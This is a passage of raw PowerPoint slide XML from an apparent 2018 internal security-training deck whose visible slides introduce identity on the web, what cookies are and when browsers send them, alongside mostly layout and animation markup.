                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Who the hell are you?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2115" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF320A"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="2116" name="4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2118" name="fry.png" descr="fry.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19352683" y="10634260"/>
            <a:ext cx="391177" cy="514705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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102"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2102"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2090"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2090"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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ID="10" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2107"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2107"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2093"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2092"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2092"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="27" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetClass="entr" nodeType="clickEffect" presetID="10" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2112"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2095"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2094"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2094"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="39" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetClass="entr" nodeType="clickEffect" presetID="10" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2117"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="300"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2118"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2118"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2097"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="51" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2096"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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95" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2094" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2091" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2093" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2090" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2092" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2096" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2117" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2102" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2118" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2112" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2107" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="2097" grpId="12"/>
    </p:bldLst>
  </p:timing>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2"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12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124" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2125" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2126" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3579481" y="1639303"/>
            <a:ext cx="18590868" cy="9968192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2127" name="Yummy!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4845556" y="10379946"/>
            <a:ext cx="1073102" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Yummy!</a:t>
            </a:r>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1" name="What are cookies?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>What are cookies?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2132" name="Cookies are just some data, usually name/value pairs.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Cookies are just some data, usually name/value pairs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Server asks client to store and remember them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Client sends them as headers for requests to the same site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2133"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134"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135" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2136" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2137" name="If the domain, path, and protocol all match."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14811246" y="10994938"/>
            <a:ext cx="4956151" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If the domain, path, and protocol all match.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2138" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="17485273" y="9847776"/>
            <a:ext cx="465566" cy="1034070"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>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2" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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14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144" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2145" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2146" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240080" y="4679430"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2147" name="www.png" descr="www.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15985098" y="4679430"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2152" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2309309" y="1930863"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2148" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2149" name="Hi, I’m Bob! Here’s my password."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
